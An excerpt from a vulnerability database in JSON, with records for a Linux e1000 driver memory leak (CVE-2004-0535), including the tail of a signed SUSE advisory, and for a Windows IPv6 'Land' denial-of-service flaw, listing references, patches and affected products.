below. \n    =====================================================================\n______________________________________________________________________________\n\n    The information in this advisory may be distributed or reproduced,\n    provided that the advisory is not modified in any way. In particular,\n    it is desired that the clear-text signature must show proof of the\n    authenticity of the text. \n    SUSE Linux AG makes no warranties of any kind whatsoever with respect\n    to the information contained in this security advisory. \n\nType Bits/KeyID    Date       User ID\npub  2048R/3D25D3D9 1999-03-06 SuSE Security Team \u003csecurity@suse.de\u003e\npub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key \u003cbuild@suse.de\u003e\n\n#####-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see http://www.gnupg.org\n\n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\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\n=LRKC\n- -----END PGP PUBLIC KEY BLOCK-----\n\n- -- \n -                                                                      -\n| Roman Drahtm\\xfcller      \u003cdraht@suse.de\u003e // \"You don\u0027t need eyes to see, |\n  SUSE Linux AG - Security       Phone: //             you need vision!\"\n| N\\xfcrnberg, Germany     +49-911-740530 //           Maxi Jazz, Faithless |\n -                                                                      -\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy\nBi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt\nOsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD\njwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA\niud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT\nWntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ==\n=24bz\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0535",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "10352",
        "trust": 2.8
      },
      {
        "db": "XF",
        "id": "16159",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072",
        "trust": 0.7
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200407-02",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2004:020",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:11136",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:418",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:413",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:845",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2004:062",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "1000",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2004-186",
        "trust": 0.6
      },
      {
        "db": "SGI",
        "id": "20040804-01-U",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-8965",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "33705",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "id": "VAR-200408-0086",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8965"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:02:35.169000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel_30",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_30.html"
      },
      {
        "title": "kernel_se20",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_se20.html"
      },
      {
        "title": "RHSA-2004:418",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-418.html"
      },
      {
        "title": "RHSA-2004:413",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-413.html"
      },
      {
        "title": "RHSA-2004:327",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/"
      },
      {
        "title": "RHSA-2004:327",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-327j.html"
      },
      {
        "title": "RHSA-2004:418",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-418j.html"
      },
      {
        "title": "RHSA-2004:413",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-413j.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10352"
      },
      {
        "trust": 2.0,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.27.log"
      },
      {
        "trust": 1.7,
        "url": "http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=125168"
      },
      {
        "trust": 1.7,
        "url": "http://lwn.net/articles/91155/"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-200407-02.xml"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:062"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-413.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-418.html"
      },
      {
        "trust": 1.7,
        "url": "ftp://patches.sgi.com/support/free/security/advisories/20040804-01-u.asc"
      },
      {
        "trust": 1.7,
        "url": "http://www.novell.com/linux/security/advisories/2004_20_kernel.html"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000845"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/16159"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11136"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16159"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0535"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0535"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:11136"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-413.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-418.html"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000845"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0497"
      },
      {
        "trust": 0.1,
        "url": "http://www.gnupg.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0626"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0496"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-08-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "date": "2004-05-14T00:00:00",
        "db": "BID",
        "id": "10352"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "date": "2004-07-02T12:32:00",
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "date": "2004-08-06T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "date": "2004-05-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8965"
      },
      {
        "date": "2010-08-05T19:46:00",
        "db": "BID",
        "id": "10352"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "date": "2017-10-11T01:29:27.607000",
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  e1000 Driver memory leak vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Boundary Condition Error",
    "sources": [
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ],
    "trust": 0.9
  }
}

var-200505-0723
Vulnerability from variot

The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the "Land" vulnerability (CVE-1999-0016). When a packet of this type is handled, an infinite loop is initiated and the affected system halts. A remote attacker may exploit this issue to deny service for legitimate users

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200505-0723",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "microsoft",
        "version": "datacenter_64-bit"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "microsoft",
        "version": "standard"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "microsoft",
        "version": "enterprise"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "microsoft",
        "version": "enterprise_64-bit"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "web"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows server 2003",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "windows xp home sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "2.1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.01"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.31"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.5"
      },
      {
        "model": "ios aa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.10"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.6"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.0"
      },
      {
        "model": "windows xp professional",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt enterprise server sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "3.0"
      },
      {
        "model": "windows server enterprise edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.34"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "ios bt",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0.12"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "modular messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "windows xp tablet pc edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios ia",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.3"
      },
      {
        "model": "windows xp professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x64"
      },
      {
        "model": "windows xp tablet pc edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "3.1"
      },
      {
        "model": "windows server enterprise edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.1.x"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.1"
      },
      {
        "model": "windows xp 64-bit edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3.16"
      },
      {
        "model": "windows server enterprise edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.38"
      },
      {
        "model": "windows server standard edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "netware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "4.1"
      },
      {
        "model": "windows server standard edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "2.0"
      },
      {
        "model": "windows xp media center edition",
        "scope": null,
